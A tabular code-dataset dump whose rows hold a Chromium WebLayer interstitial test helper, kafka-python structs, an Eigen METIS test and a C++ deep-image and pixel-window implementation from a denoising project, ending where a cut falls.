max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
14,668 | // Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "weblayer/test/interstitial_utils.h"
#include "components/security_interstitials/content/bad_clock_blocking_page.h"
#include "components/security_interstitials/content/captive_portal_blocking_page.h"
#include "components/security_interstitials/content/insecure_form_blocking_page.h"
#include "components/security_interstitials/content/security_interstitial_page.h"
#include "components/security_interstitials/content/security_interstitial_tab_helper.h"
#include "components/security_interstitials/content/ssl_blocking_page.h"
#include "weblayer/browser/tab_impl.h"
namespace weblayer {
namespace {
// Returns the security interstitial currently showing in |tab|, or null if
// there is no such interstitial.
security_interstitials::SecurityInterstitialPage*
GetCurrentlyShowingInterstitial(Tab* tab) {
TabImpl* tab_impl = static_cast<TabImpl*>(tab);
security_interstitials::SecurityInterstitialTabHelper* helper =
security_interstitials::SecurityInterstitialTabHelper::FromWebContents(
tab_impl->web_contents());
return helper
? helper
->GetBlockingPageForCurrentlyCommittedNavigationForTesting()
: nullptr;
}
// Returns true if a security interstitial of type |type| is currently showing
// in |tab|.
bool IsShowingInterstitialOfType(
Tab* tab,
security_interstitials::SecurityInterstitialPage::TypeID type) {
auto* blocking_page = GetCurrentlyShowingInterstitial(tab);
if (!blocking_page)
return false;
return blocking_page->GetTypeForTesting() == type;
}
} // namespace
bool IsShowingSecurityInterstitial(Tab* tab) {
return GetCurrentlyShowingInterstitial(tab) != nullptr;
}
bool IsShowingSSLInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(tab, SSLBlockingPage::kTypeForTesting);
}
bool IsShowingCaptivePortalInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(
tab, CaptivePortalBlockingPage::kTypeForTesting);
}
bool IsShowingBadClockInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(tab,
BadClockBlockingPage::kTypeForTesting);
}
bool IsShowingInsecureFormInterstitial(Tab* tab) {
return IsShowingInterstitialOfType(
tab, security_interstitials::InsecureFormBlockingPage::kTypeForTesting);
}
} // namespace weblayer
| 796 |
4,389 | """ Other useful structs """
from __future__ import absolute_import
from collections import namedtuple
"""A topic and partition tuple
Keyword Arguments:
topic (str): A topic name
partition (int): A partition id
"""
TopicPartition = namedtuple("TopicPartition",
["topic", "partition"])
"""A Kafka broker metadata used by admin tools.
Keyword Arguments:
nodeID (int): The Kafka broker id.
host (str): The Kafka broker hostname.
port (int): The Kafka broker port.
rack (str): The rack of the broker, which is used to in rack aware
partition assignment for fault tolerance.
Examples: `RACK1`, `us-east-1d`. Default: None
"""
BrokerMetadata = namedtuple("BrokerMetadata",
["nodeId", "host", "port", "rack"])
"""A topic partition metadata describing the state in the MetadataResponse.
Keyword Arguments:
topic (str): The topic name of the partition this metadata relates to.
partition (int): The id of the partition this metadata relates to.
leader (int): The id of the broker that is the leader for the partition.
replicas (List[int]): The ids of all brokers that contain replicas of the
partition.
isr (List[int]): The ids of all brokers that contain in-sync replicas of
the partition.
error (KafkaError): A KafkaError object associated with the request for
this partition metadata.
"""
PartitionMetadata = namedtuple("PartitionMetadata",
["topic", "partition", "leader", "replicas", "isr", "error"])
"""The Kafka offset commit API
The Kafka offset commit API allows users to provide additional metadata
(in the form of a string) when an offset is committed. This can be useful
(for example) to store information about which node made the commit,
what time the commit was made, etc.
Keyword Arguments:
offset (int): The offset to be committed
metadata (str): Non-null metadata
"""
OffsetAndMetadata = namedtuple("OffsetAndMetadata",
# TODO add leaderEpoch: OffsetAndMetadata(offset, leaderEpoch, metadata)
["offset", "metadata"])
"""An offset and timestamp tuple
Keyword Arguments:
offset (int): An offset
timestamp (int): The timestamp associated to the offset
"""
OffsetAndTimestamp = namedtuple("OffsetAndTimestamp",
["offset", "timestamp"])
MemberInformation = namedtuple("MemberInformation",
["member_id", "client_id", "client_host", "member_metadata", "member_assignment"])
GroupInformation = namedtuple("GroupInformation",
["error_code", "group", "state", "protocol_type", "protocol", "members", "authorized_operations"])
"""Define retry policy for async producer
Keyword Arguments:
Limit (int): Number of retries. limit >= 0, 0 means no retries
backoff_ms (int): Milliseconds to backoff.
retry_on_timeouts:
"""
RetryOptions = namedtuple("RetryOptions",
["limit", "backoff_ms", "retry_on_timeouts"])
| 939 |
2,111 | // This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2012 <NAME> <<EMAIL>>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#include "sparse_solver.h"
#include <Eigen/SparseLU>
#include <Eigen/MetisSupport>
#include <unsupported/Eigen/SparseExtra>
template<typename T> void test_metis_T()
{
SparseLU<SparseMatrix<T, ColMajor>, MetisOrdering<int> > sparselu_metis;
check_sparse_square_solving(sparselu_metis);
}
EIGEN_DECLARE_TEST(metis_support)
{
CALL_SUBTEST_1(test_metis_T<double>());
}
| 266 |
826 | // This file is part of the reference implementation for the paper
// Bayesian Collaborative Denoising for Monte-Carlo Rendering
// <NAME> and <NAME>.
// Computer Graphics Forum (Proc. EGSR 2017), vol. 36, no. 4, p. 137-153, 2017
//
// All rights reserved. Use of this source code is governed by a
// BSD-style license that can be found in the LICENSE.txt file.
#include <iostream>
#include <algorithm>
#include <cassert>
namespace bcd
{
// ------------------------ PixelPosition ------------------------
inline PixelPosition::PixelPosition() : m_line(0), m_column(0) {}
inline PixelPosition::PixelPosition(int i_line, int i_column) :
m_line(i_line), m_column(i_column) {}
inline PixelPosition::PixelPosition(const PixelPosition& i_rPos) :
m_line(i_rPos.m_line), m_column(i_rPos.m_column) {}
inline PixelPosition& PixelPosition::operator=(const PixelPosition& i_rPos)
{
m_line = i_rPos.m_line;
m_column = i_rPos.m_column;
return *this;
}
inline void PixelPosition::get(int& o_rLine, int& o_rColumn) const
{
o_rLine = m_line;
o_rColumn = m_column;
}
inline PixelPosition PixelPosition::operator+(const PixelPosition& i_rPix) const
{
return PixelPosition(m_line + i_rPix.m_line, m_column + i_rPix.m_column);
}
inline PixelPosition PixelPosition::operator-(const PixelPosition& i_rPix) const
{
return PixelPosition(m_line - i_rPix.m_line, m_column - i_rPix.m_column);
}
inline bool PixelPosition::operator==(const PixelPosition& i_rPix) const
{
return (m_line == i_rPix.m_line) && (m_column == i_rPix.m_column);
}
inline bool PixelPosition::operator!=(const PixelPosition& i_rPix) const
{
return (m_line != i_rPix.m_line) || (m_column != i_rPix.m_column);
}
// ------------------------ PixelWindow::iterator ------------------------
inline PixelWindow::iterator::iterator() :
m_minCorner(),
m_maxCorner(),
m_currentPixel()
{
}
inline PixelWindow::iterator::iterator(PixelPosition i_centralPixel, int i_radius) :
m_minCorner(i_centralPixel.m_line - i_radius, i_centralPixel.m_column - i_radius),
m_maxCorner(i_centralPixel.m_line + i_radius, i_centralPixel.m_column + i_radius),
m_currentPixel(m_minCorner)
{
}
inline PixelWindow::iterator::iterator(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_bufferWidth, i_bufferHeight, i_centralPixel, i_radius, i_border);
}
inline PixelWindow::iterator::iterator(
PixelPosition i_minCorner,
PixelPosition i_maxCorner,
PixelPosition i_currentPixel) :
m_minCorner(i_minCorner),
m_maxCorner(i_maxCorner),
m_currentPixel(i_currentPixel)
{
}
inline void PixelWindow::iterator::reset(PixelPosition i_centralPixel, int i_radius)
{
m_minCorner = PixelPosition(i_centralPixel.m_line - i_radius, i_centralPixel.m_column - i_radius);
m_maxCorner = PixelPosition(i_centralPixel.m_line + i_radius, i_centralPixel.m_column + i_radius);
m_currentPixel = m_minCorner;
}
inline void PixelWindow::iterator::reset(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(i_bufferHeight - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(i_bufferWidth - 1 - i_border, i_centralPixel.m_column + i_radius));
m_currentPixel = m_minCorner;
}
inline PixelWindowSize PixelWindow::iterator::getSize() const
{
return PixelWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
inline const PixelPosition& PixelWindow::iterator::operator*() const
{
return m_currentPixel;
}
inline PixelWindow::iterator& PixelWindow::iterator::operator++()
{
if(m_currentPixel.m_column == m_maxCorner.m_column)
{
m_currentPixel.m_line++;
m_currentPixel.m_column = m_minCorner.m_column;
}
else
{
m_currentPixel.m_column++;
}
return *this;
}
inline bool PixelWindow::iterator::hasEnded() const
{
return m_currentPixel.m_line > m_maxCorner.m_line;
}
inline bool PixelWindow::iterator::operator!=(const iterator& i_rIt) const
{
return m_currentPixel != i_rIt.m_currentPixel;
}
// ------------------------ PixelWindow ------------------------
inline PixelWindow::PixelWindow() :
m_width(0),
m_height(0),
m_minCorner(),
m_maxCorner()
{
}
inline PixelWindow::PixelWindow(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_bufferWidth, i_bufferHeight, i_centralPixel, i_radius, i_border);
}
inline void PixelWindow::reset(
int i_bufferWidth,
int i_bufferHeight,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_bufferWidth;
m_height = i_bufferHeight;
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
}
inline PixelWindowSize PixelWindow::getSize() const
{
return PixelWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
inline PixelWindow::iterator PixelWindow::begin() const
{
return iterator(
m_minCorner, m_maxCorner,
m_minCorner);
}
inline PixelWindow::iterator PixelWindow::end() const
{
return iterator(
m_minCorner, m_maxCorner,
PixelPosition(m_maxCorner.m_line + 1, m_minCorner.m_column));
}
// ------------------------ DeepImage<>::iterator ------------------------
template < typename scalar >
inline DeepImage< scalar >::iterator::iterator() :
m_pCurrentPixelDataPtr(nullptr), m_nbOfScalarsInPixelData(0)
{
}
template < typename scalar >
inline DeepImage< scalar >::iterator::iterator(scalar* i_pPixelDataPtr, int i_nbOfScalarsInPixelData) :
m_pCurrentPixelDataPtr(i_pPixelDataPtr), m_nbOfScalarsInPixelData(i_nbOfScalarsInPixelData)
{
}
template < typename scalar >
inline scalar* DeepImage< scalar >::iterator::operator*() const
{
return m_pCurrentPixelDataPtr;
}
template < typename scalar >
inline typename DeepImage< scalar >::iterator& DeepImage< scalar >::iterator::operator++()
{
m_pCurrentPixelDataPtr += m_nbOfScalarsInPixelData;
return *this;
}
template < typename scalar >
inline scalar& DeepImage< scalar >::iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentPixelDataPtr[i_dimensionIndex];
}
template < typename scalar >
inline bool DeepImage< scalar >::iterator::operator!=(const iterator& i_rIt) const
{
return m_pCurrentPixelDataPtr != i_rIt.m_pCurrentPixelDataPtr;
}
// ------------------------ DeepImage<>::const_iterator ------------------------
template < typename scalar >
inline DeepImage< scalar >::const_iterator::const_iterator() :
m_pCurrentPixelDataPtr(nullptr), m_nbOfScalarsInPixelData(0)
{
}
template < typename scalar >
inline DeepImage< scalar >::const_iterator::const_iterator(const scalar* i_pPixelDataPtr, int i_nbOfScalarsInPixelData) :
m_pCurrentPixelDataPtr(i_pPixelDataPtr), m_nbOfScalarsInPixelData(i_nbOfScalarsInPixelData)
{
}
template < typename scalar >
inline const scalar* DeepImage< scalar >::const_iterator::operator*() const
{
return m_pCurrentPixelDataPtr;
}
template < typename scalar >
inline typename DeepImage< scalar >::const_iterator& DeepImage< scalar >::const_iterator::operator++()
{
m_pCurrentPixelDataPtr += m_nbOfScalarsInPixelData;
return *this;
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::const_iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentPixelDataPtr[i_dimensionIndex];
}
template < typename scalar >
inline bool DeepImage< scalar >::const_iterator::operator!=(const const_iterator& i_rIt) const
{
return m_pCurrentPixelDataPtr != i_rIt.m_pCurrentPixelDataPtr;
}
// ------------------------ DeepImage<> ------------------------
template < typename scalar >
inline DeepImage< scalar >::DeepImage() :
m_width(0u), m_height(0u), m_depth(0u),
m_widthTimesDepth(0u),
m_data() {}
template < typename scalar >
inline DeepImage< scalar >::DeepImage(int i_width, int i_height, int i_depth) :
m_width(i_width), m_height(i_height), m_depth(i_depth),
m_widthTimesDepth(i_width * i_depth),
m_data(i_width * i_height * i_depth) {}
// DeepImage(DeepImage<scalar>&&) = default; ///< Default move constructor does not work with visual studio 2013
template < typename scalar >
inline DeepImage< scalar >::DeepImage(DeepImage<scalar>&& i_tImage) :
m_width(i_tImage.m_width), m_height(i_tImage.m_height), m_depth(i_tImage.m_depth),
m_widthTimesDepth(i_tImage.m_width * i_tImage.m_depth),
m_data(std::move(i_tImage.m_data)) {}
// DeepImage< scalar >& operator=(DeepImage<scalar>&&) = default; ///< Default move assignment operator does not work with visual studio 2013
template < typename scalar >
inline DeepImage< scalar >& DeepImage< scalar >::operator=(DeepImage<scalar>&& i_tImage)
{
m_width = i_tImage.m_width;
m_height = i_tImage.m_height;
m_depth = i_tImage.m_depth;
m_widthTimesDepth = i_tImage.m_width * i_tImage.m_depth;
m_data = std::move(i_tImage.m_data);
return *this;
}
template < typename scalar >
inline void DeepImage< scalar >::resize(int i_width, int i_height, int i_depth)
{
m_width = i_width;
m_height = i_height;
m_depth = i_depth;
m_widthTimesDepth = i_width * i_depth;
m_data.resize(i_width * i_height * i_depth);
}
template < typename scalar >
inline void DeepImage< scalar >::copyDataFrom(const scalar* i_pData)
{
std::copy(i_pData, i_pData + getSize(), m_data.begin());
}
template < typename scalar >
inline void DeepImage< scalar >::copyDataTo(scalar* i_pData) const
{
std::copy(m_data.begin(), m_data.end(), i_pData);
}
template < typename scalar >
inline int DeepImage< scalar >::getWidth() const { return m_width; }
template < typename scalar >
inline int DeepImage< scalar >::getHeight() const { return m_height; }
template < typename scalar >
inline int DeepImage< scalar >::getDepth() const { return m_depth; }
template < typename scalar >
inline int DeepImage< scalar >::getSize() const { return m_data.size(); }
template < typename scalar >
inline scalar* DeepImage< scalar >::getDataPtr() { return m_data.data(); }
template < typename scalar >
inline const scalar* DeepImage< scalar >::getDataPtr() const { return m_data.data(); }
template < typename scalar >
inline PixelPosition DeepImage< scalar >::clamp(const PixelPosition& pos) const {
return PixelPosition(std::max(0, std::min(pos.m_line, m_height - 1)),
std::max(0, std::min(pos.m_column, m_width - 1)));
}
template < typename scalar >
inline int DeepImage< scalar >::glueIndices(int i_line, int i_column, int i_dimensionIndex) const
{
assert(i_line >= 0);
assert(i_line < m_height);
assert(i_column >= 0);
assert(i_column < m_width);
assert(i_dimensionIndex >= 0);
assert(i_dimensionIndex < m_depth);
return i_line * m_widthTimesDepth + i_column * m_depth + i_dimensionIndex;
}
template < typename scalar >
inline int DeepImage< scalar >::glueIndices(
int i_width, int i_height, int i_depth,
int i_line, int i_column, int i_dimensionIndex)
{
assert(i_line >= 0);
assert(i_line < i_height);
assert(i_column >= 0);
assert(i_column < i_width);
assert(i_dimensionIndex >= 0);
assert(i_dimensionIndex < i_depth);
return (i_line * i_width + i_column) * i_depth + i_dimensionIndex;
}
template < typename scalar >
inline void DeepImage< scalar >::splitIndex(
int& o_rLine, int& o_rColumn, int& o_rDimensionIndex,
int i_buffer1DIndex) const
{
o_rLine = i_buffer1DIndex / m_widthTimesDepth;
o_rColumn = (i_buffer1DIndex / m_depth) % m_width;
o_rDimensionIndex = i_buffer1DIndex % m_depth;
}
template < typename scalar >
inline void DeepImage< scalar >::splitIndex(
int& o_rLine, int& o_rColumn, int& o_rDimensionIndex,
int i_buffer1DIndex,
int i_width, int i_height, int i_depth)
{
o_rLine = i_buffer1DIndex / (i_width * i_depth);
o_rColumn = (i_buffer1DIndex / i_depth) % i_width;
o_rDimensionIndex = i_buffer1DIndex % i_depth;
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::get(int i_line, int i_column, int i_dimensionIndex) const
{
return m_data[glueIndices(i_line, i_column, i_dimensionIndex)];
}
template < typename scalar >
inline scalar& DeepImage< scalar >::get(int i_line, int i_column, int i_dimensionIndex)
{
return m_data[glueIndices(i_line, i_column, i_dimensionIndex)];
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::get(PixelPosition i_pixel, int i_dimensionIndex) const
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline scalar& DeepImage< scalar >::get(PixelPosition i_pixel, int i_dimensionIndex)
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline const scalar& DeepImage< scalar >::get(int i_buffer1DIndex) const
{
return m_data[i_buffer1DIndex];
}
template < typename scalar >
inline scalar& DeepImage< scalar >::get(int i_buffer1DIndex)
{
return m_data[i_buffer1DIndex];
}
template < typename scalar >
inline const scalar DeepImage< scalar >::getValue(PixelPosition i_pixel, int i_dimensionIndex) const
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline scalar DeepImage< scalar >::getValue(PixelPosition i_pixel, int i_dimensionIndex)
{
return m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)];
}
template < typename scalar >
inline void DeepImage< scalar >::set(int i_line, int i_column, int i_dimensionIndex, scalar i_value)
{
m_data[glueIndices(i_line, i_column, i_dimensionIndex)] = i_value;
}
template < typename scalar >
inline void DeepImage< scalar >::set(PixelPosition i_pixel, int i_dimensionIndex, scalar i_value)
{
m_data[glueIndices(i_pixel.m_line, i_pixel.m_column, i_dimensionIndex)] = i_value;
}
template < typename scalar >
inline void DeepImage< scalar >::set(int i_buffer1DIndex, scalar i_value) { m_data[i_buffer1DIndex] = i_value; }
template < typename scalar >
inline void DeepImage< scalar >::set(int i_line, int i_column, const scalar* i_pVectorValue)
{
std::copy(i_pVectorValue, i_pVectorValue + m_depth, &(get(i_line, i_column, 0)));
// for(int d = 0; d < m_depth; d++)
// set(i_line, i_column, d, i_pVectorValue[d]);
}
template < typename scalar >
inline void DeepImage< scalar >::set(PixelPosition i_pixel, const scalar* i_pVectorValue)
{
std::copy(i_pVectorValue, i_pVectorValue + m_depth, &(get(i_pixel)));
// for(int d = 0; d < m_depth; d++)
// set(i_line, i_column, d, i_pVectorValue[d]);
}
template < typename scalar >
inline void DeepImage< scalar >::isotropicalScale(scalar i_scaleFactor)
{
for(auto it = m_data.begin(); it != m_data.end(); it++)
*it *= i_scaleFactor;
}
template < typename scalar >
inline void DeepImage< scalar >::anisotropicalScale(const scalar* i_scaleFactors)
{
int size = getSize();
for(int d = 0; d < size; d++)
m_data[d] *= i_scaleFactors[d % m_depth];
}
template < typename scalar >
inline void DeepImage< scalar >::fill(scalar f)
{
std::fill(m_data.begin(), m_data.end(), f);
}
template < typename scalar >
inline bool DeepImage< scalar >::isEmpty() const
{
return m_width == 0 || m_height == 0 || m_depth == 0;
}
template < typename scalar >
inline void DeepImage< scalar >::clearAndFreeMemory()
{
m_width = m_height = m_depth = m_widthTimesDepth = 0;
std::vector< scalar >().swap(m_data); // swap trick to free memory
}
template < typename scalar >
inline typename DeepImage< scalar >::iterator DeepImage< scalar >::begin()
{
return DeepImage< scalar >::iterator(m_data.data(), m_depth);
}
template < typename scalar >
inline typename DeepImage< scalar >::iterator DeepImage< scalar >::end()
{
return DeepImage< scalar >::iterator(m_data.data() + m_widthTimesDepth * m_height, m_depth);
}
template < typename scalar >
inline typename DeepImage< scalar >::const_iterator DeepImage< scalar >::begin() const
{
return DeepImage< scalar >::const_iterator(m_data.data(), m_depth);
}
template < typename scalar >
inline typename DeepImage< scalar >::const_iterator DeepImage< scalar >::end() const
{
return DeepImage< scalar >::const_iterator(m_data.data() + m_widthTimesDepth * m_height, m_depth);
}
template < typename scalar >
inline DeepImage<scalar>& DeepImage< scalar >::operator+=(const DeepImage& i_rImage)
{
typename std::vector<scalar>::const_iterator it = i_rImage.m_data.cbegin();
for(scalar& rValue : m_data)
rValue += *it++;
return *this;
}
template < typename scalar >
inline DeepImage<scalar>& DeepImage< scalar >::operator-=(const DeepImage& i_rImage)
{
typename std::vector<scalar>::const_iterator it = i_rImage.m_data.cbegin();
for(scalar& rValue : m_data)
rValue -= *it++;
return *this;
}
// ------------------------ ImageWindow<>::iterator ------------------------
template < typename scalar >
inline ImageWindow< scalar >::iterator::iterator() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_currentPixel(),
m_pCurrentDataPointer(nullptr)
{
}
template < typename scalar >
inline ImageWindow< scalar >::iterator::iterator(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline ImageWindow< scalar >::iterator::iterator(
int i_width,
int i_height,
int i_depth,
PixelPosition i_minCorner,
PixelPosition i_maxCorner,
PixelPosition i_currentPixel,
scalar* i_pCurrentDataPointer) :
m_width(i_width),
m_height(i_height),
m_depth(i_depth),
m_minCorner(i_minCorner),
m_maxCorner(i_maxCorner),
m_currentPixel(i_currentPixel),
m_pCurrentDataPointer(i_pCurrentDataPointer)
{
}
template < typename scalar >
inline void ImageWindow< scalar >::iterator::reset(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_currentPixel = m_minCorner;
m_pCurrentDataPointer = &(i_rImage.get(m_currentPixel, 0));
}
template < typename scalar >
inline ImageWindowSize ImageWindow< scalar >::iterator::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline scalar* ImageWindow< scalar >::iterator::operator*() const
{
return m_pCurrentDataPointer;
}
template < typename scalar >
inline typename ImageWindow< scalar >::iterator& ImageWindow< scalar >::iterator::operator++()
{
if(m_currentPixel.m_column == m_maxCorner.m_column)
{
m_currentPixel.m_line++;
m_currentPixel.m_column = m_minCorner.m_column;
m_pCurrentDataPointer += m_depth * (m_width + m_minCorner.m_column - m_maxCorner.m_column);
}
else
{
m_currentPixel.m_column++;
m_pCurrentDataPointer += m_depth;
}
return *this;
}
template < typename scalar >
inline bool ImageWindow< scalar >::iterator::hasEnded() const
{
return m_currentPixel.m_line > m_maxCorner.m_line;
}
template < typename scalar >
inline scalar& ImageWindow< scalar >::iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentDataPointer[i_dimensionIndex];
}
template < typename scalar >
inline bool ImageWindow< scalar >::iterator::operator!=(const iterator& i_rIt) const
{
return m_pCurrentDataPointer != i_rIt.m_pCurrentDataPointer;
}
// ------------------------ ImageWindow<> ------------------------
template < typename scalar >
inline ImageWindow< scalar >::ImageWindow() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_pMinCornerDataPointer(nullptr)
{
}
template < typename scalar >
inline ImageWindow< scalar >::ImageWindow(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline void ImageWindow< scalar >::reset(
DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_pMinCornerDataPointer = &(i_rImage.get(m_minCorner, 0));
}
template < typename scalar >
inline ImageWindowSize ImageWindow< scalar >::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline typename ImageWindow< scalar >::iterator ImageWindow< scalar >::begin() const
{
return iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
m_minCorner,
m_pMinCornerDataPointer);
}
template < typename scalar >
inline typename ImageWindow< scalar >::iterator ImageWindow< scalar >::end() const
{
return iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
PixelPosition(m_maxCorner.m_line + 1, m_minCorner.m_column),
m_pMinCornerDataPointer + (1 + m_maxCorner.m_line - m_minCorner.m_line) * m_depth * m_width);
}
// ------------------------ ConstImageWindow<>::iterator ------------------------
template < typename scalar >
inline ConstImageWindow< scalar >::iterator::iterator() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_currentPixel(),
m_pCurrentDataPointer(nullptr)
{
}
template < typename scalar >
inline ConstImageWindow< scalar >::iterator::iterator(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline ConstImageWindow< scalar >::iterator::iterator(
int i_width,
int i_height,
int i_depth,
PixelPosition i_minCorner,
PixelPosition i_maxCorner,
PixelPosition i_currentPixel,
const scalar* i_pCurrentDataPointer) :
m_width(i_width),
m_height(i_height),
m_depth(i_depth),
m_minCorner(i_minCorner),
m_maxCorner(i_maxCorner),
m_currentPixel(i_currentPixel),
m_pCurrentDataPointer(i_pCurrentDataPointer)
{
}
template < typename scalar >
inline void ConstImageWindow< scalar >::iterator::reset(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_currentPixel = m_minCorner;
m_pCurrentDataPointer = &(i_rImage.get(m_currentPixel, 0));
}
template < typename scalar >
inline ImageWindowSize ConstImageWindow< scalar >::iterator::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline const scalar* ConstImageWindow< scalar >::iterator::operator*() const
{
return m_pCurrentDataPointer;
}
template < typename scalar >
inline typename ConstImageWindow< scalar >::iterator& ConstImageWindow< scalar >::iterator::operator++()
{
if(m_currentPixel.m_column == m_maxCorner.m_column)
{
m_currentPixel.m_line++;
m_currentPixel.m_column = m_minCorner.m_column;
m_pCurrentDataPointer += m_depth * (m_width + m_minCorner.m_column - m_maxCorner.m_column);
}
else
{
m_currentPixel.m_column++;
m_pCurrentDataPointer += m_depth;
}
return *this;
}
template < typename scalar >
inline bool ConstImageWindow< scalar >::iterator::hasEnded() const
{
return m_currentPixel.m_line > m_maxCorner.m_line;
}
template < typename scalar >
inline const scalar& ConstImageWindow< scalar >::iterator::operator[](int i_dimensionIndex) const
{
return m_pCurrentDataPointer[i_dimensionIndex];
}
template < typename scalar >
inline bool ConstImageWindow< scalar >::iterator::operator!=(const iterator& i_rIt) const
{
return m_pCurrentDataPointer != i_rIt.m_pCurrentDataPointer;
}
// ------------------------ ImageWindow<> ------------------------
template < typename scalar >
inline ConstImageWindow< scalar >::ConstImageWindow() :
m_width(0),
m_height(0),
m_depth(0),
m_minCorner(),
m_maxCorner(),
m_pMinCornerDataPointer(nullptr)
{
}
template < typename scalar >
inline ConstImageWindow< scalar >::ConstImageWindow(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
reset(i_rImage, i_centralPixel, i_radius, i_border);
}
template < typename scalar >
inline void ConstImageWindow< scalar >::reset(
const DeepImage< scalar >& i_rImage,
PixelPosition i_centralPixel,
int i_radius,
int i_border)
{
m_width = i_rImage.getWidth();
m_height = i_rImage.getHeight();
m_depth = i_rImage.getDepth();
m_minCorner = PixelPosition(
std::max(i_border, i_centralPixel.m_line - i_radius),
std::max(i_border, i_centralPixel.m_column - i_radius));
m_maxCorner = PixelPosition(
std::min(m_height - 1 - i_border, i_centralPixel.m_line + i_radius),
std::min(m_width - 1 - i_border, i_centralPixel.m_column + i_radius));
m_pMinCornerDataPointer = &(i_rImage.get(m_minCorner, 0));
}
template < typename scalar >
inline ImageWindowSize ConstImageWindow< scalar >::getSize() const
{
return ImageWindowSize(1, 1) + m_maxCorner - m_minCorner;
}
template < typename scalar >
inline typename ConstImageWindow<scalar>::iterator ConstImageWindow< scalar >::begin() const
{
return ConstImageWindow<scalar>::iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
m_minCorner,
m_pMinCornerDataPointer);
}
template < typename scalar >
inline typename ConstImageWindow<scalar>::iterator ConstImageWindow< scalar >::end() const
{
return ConstImageWindow<scalar>::iterator(
m_width, m_height, m_depth,
m_minCorner, m_maxCorner,
PixelPosition(m_maxCorner.m_line + 1, m_minCorner.m_column),
